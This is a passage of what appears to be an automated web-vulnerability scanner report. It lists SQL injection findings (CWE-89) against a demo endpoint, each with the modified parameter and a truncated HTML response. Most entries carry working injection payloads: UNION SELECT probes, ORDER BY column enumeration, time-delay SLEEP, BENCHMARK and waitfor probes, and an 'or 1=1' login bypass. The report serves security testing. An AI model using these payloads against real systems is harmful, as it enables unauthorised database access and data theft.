x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1760Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1-false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1761\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1762\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1763\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1764\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ';waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1765\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1766\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1767\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1768Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1769\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1770\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1771\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1772\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1773\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 